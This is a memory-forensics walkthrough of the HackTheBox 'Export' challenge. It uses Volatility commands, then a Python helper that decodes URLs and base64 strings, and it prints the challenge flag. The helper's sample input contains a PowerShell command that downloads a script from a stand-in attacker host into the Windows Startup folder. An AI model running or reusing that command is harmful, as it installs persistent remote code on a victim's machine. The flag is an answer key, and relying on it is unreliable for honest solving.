HackTheBox: Export

We spotted a suspicious connection to one of our servers, and immediately took a memory dump. Can you figure out what the attackers were up to?

Information

Challenge: Export

Category:
Forensics

Difficulty:
Easy

Files: Export.zip, 138 MB
– WIN-LQS146OE2S1-20201027-142607.raw, 512 MB (inside the archive)

Environment: Remnux VM

My Recommendations

Download the archive from HackTheBox and verify it before extracting:

sha256sum /path/to/Export.zip

SHA256SUM: 0ea5363cd1ee973de4f5d1853f4dd04a8d25f1e701e34100e0e702fb85db1796

Walkthrough

1. Memory Analysis

First, we need to find the correct Volatility profile for this memory dump:

    vol.py -f WIN-LQS146OE2S1-20201027-142607.raw imageinfo

The first profile that imageinfo suggests usually works; here it is Win7SP1x64.

Next, we list the network connections and look for one that stands out:

    vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile=Win7SP1x64 netscan

I'm going to assume that this connection belongs to the attacker. At this point that is only speculation, so we move on to another plugin, cmdline, to see what was actually executed on the host:

    vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile=Win7SP1x64 cmdline

Here we can see that a PowerShell script was downloaded into the Startup directory, which gives the attacker persistence: anything placed there runs at the next logon. The download URL itself is encoded; once decoded, it contains a base64-encoded string, which in turn decodes to the flag:

    echo -n 'SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=' | base64 -d
    # HTB{W1Nd0ws_f0r3Ns1CS_3H?}
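As an added example (my own code, not from the original post or from Volatility), a small Python helper that automates those last two steps on saved cmdline output: URL-decode any URL it finds, pull out base64-looking tokens, and keep only the ones that decode to printable text. The sample cmdline line, its host, path and query parameter are constructed for this example; only the base64 string comes from the challenge.

```python
"""Post-process text such as saved `vol.py ... cmdline` output: URL-decode any
URLs in it, extract base64-looking tokens and decode those that yield printable
text. Example code written for this walkthrough, not part of Volatility."""
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample resembling one line of cmdline output for a PowerShell
# process that fetched a script into the Startup folder. The host, path and
# the %XX-encoded query parameter are assumptions made for the example; the
# base64 payload is the one from the challenge.
SAMPLE_CMDLINE = (
    'powershell.exe -c "(New-Object Net.WebClient).DownloadFile('
    "'http://attacker.invalid/get?p=SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D',"
    "'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu"
    "\\Programs\\Startup\\update.ps1')\""
)

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# 16+ base64 alphabet chars with optional '=' padding; short strings are
# ignored on purpose to keep false positives (path components, hostnames) down.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_urls(text):
    """Return the URLs in text, %XX-decoded (the 'decode the URL' step)."""
    return [unquote(u) for u in URL_RE.findall(text)]


def base64_candidates(text):
    """Return base64-looking tokens found in text."""
    return B64_RE.findall(text)


def decode_if_printable(token):
    """Decode token as base64; return the text if it is printable ASCII, else None.

    validate=True rejects tokens with bad padding, e.g. a payload whose trailing
    '=' is still percent-encoded because the URL was not decoded first.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or not all(32 <= b < 127 for b in raw):
        return None
    return raw.decode("ascii")


def scan(text):
    """URL-decode the URLs in text, then decode every printable base64 token.

    Returns a list of (token, decoded_text) pairs.
    """
    decoded_text = text
    for url in URL_RE.findall(text):
        decoded_text = decoded_text.replace(url, unquote(url))
    hits = []
    for tok in base64_candidates(decoded_text):
        out = decode_if_printable(tok)
        if out is not None:
            hits.append((tok, out))
    return hits


if __name__ == "__main__":
    for tok, out in scan(SAMPLE_CMDLINE):
        print(f"{tok} -> {out}")
```

Feed `scan()` the saved output of the cmdline (or consoles/netscan) plugin instead of the constructed sample. Note that without the URL-decoding step the token ends at the `%3D`, has no padding, and is rejected by `validate=True`, which is exactly why the post decodes the URL before the base64 string.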

Flag: HTB{W1Nd0ws_f0r3Ns1CS_3H?}

TLDR

– A straightforward memory forensics challenge.
– Use Volatility 2 (imageinfo, netscan, cmdline) to find the IOCs, then decode the URL and the base64 string it carries to recover the flag.

Discover more from forensicskween
